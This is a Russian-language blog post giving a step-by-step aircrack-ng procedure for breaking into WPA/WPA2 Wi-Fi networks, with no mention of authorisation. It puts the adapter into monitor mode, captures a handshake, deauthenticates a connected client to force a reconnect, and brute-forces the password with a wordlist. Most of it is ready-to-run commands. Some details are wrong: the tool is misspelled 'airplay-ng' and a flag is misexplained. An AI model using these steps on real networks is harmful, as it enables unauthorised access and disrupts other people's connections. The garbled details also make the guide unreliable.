Взлом WPA / WPA 2

WPA и WPA2 (Wi-Fi Protected Access) — представляет собой обновлённую программу сертификации устройств беспроводной связи. Технология WPA пришла на замену технологии защиты беспроводной Wi-Fi сети WEP. Плюсами WPA являются усиленная безопасность данных и ужесточённый контроль доступа к беспроводным сетям. Немаловажной характеристикой является совместимость между множеством беспроводных устройств как на аппаратном уровне, так и на программном. На данный момент WPA и WPA2 разрабатываются и продвигаются организацией Wi-Fi Alliance.


Возможно сеть, к которой необходимо получить доступ, имеет возможность подключения с помощью WPS. В этом случае задача сильно упрощается.

Пункт 0 (подготовка)

1) Видит ли наш адаптер система.


airmon-ng

Если в списке есть хоть один адаптер, то все отлично, продолжаем. В противном случае нужно для начала решить эту проблему.

2) Проверим, не использует ли какое-нибудь приложение наш адаптер:


airmon-ng check

wlan0 — ваш беспроводной интерфейс.

Система должна вывести список приложений, которые используют адаптер. Можем попытаться завершить их сами и проверить, что они больше не используют адаптер или выполнить вот такую команду:


airmon-ng check kill

Если список приложений пуст, то идем дальше.

Пункт 1 (выбор канала)

1) Сканируем все каналы:

 
airodump-ng wlan0

2) Выбираем канал, с которым будем работать

Пункт 2 (настройка нашего устройства)

1) Останавливаем наше устройство:

airmon-ng stop wlan0

2) Проверяем на наличие других устройств:

iwconfig

3) Устанавливаем устройство на, выбранный нами, канал:

airmon-ng start wlan0 "channel_number"

4) Проверяем

iwconfig

Пункт 3 (Попытка получить HandShake)

1) Отлавливаем момент подключения устройства к сети:

airodump-ng -c 9 --bssid 00:11:22:33:44:55 -w psk wlan0

2) Отсоединяем клиента:

airplay-ng -0 4 -a 00:11:22:33:44:55 -c aa:bb:cc:dd:ee:ff wlan0

Где:

  • 0 частота время между отправкой деаутентификационных пакетов
  • 4 количество деаутентификационных пакетов
  • за -a следует MAC адресс точки доступа, от которой мы хотим отключить клиента или клиентов
  • за -с следует MAC адрес клиента, которого мы хотим выгнать из сети

3) Проверяем, поймали ли HandShake:

aircrack-ng -w password.lst -b 00:11:22:33:44:55 psk*.cap

4) Если поймали, то успех, если нет, то возвращаемся к (1).

Пункт 4 (Подбор пароля)

Тут есть несколько методов:

1) Стандартный метод: Пользуемся встроенными в Kalo Linux средствами

 
aircrack-ng -w password.lst -b 00:11:22:33:44:55 psk*.cap 

2) Перебор на видеокартах: Пользуемся Elcomsoft

Добавить комментарий

Заполните поля или щелкните по значку, чтобы оставить свой комментарий:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s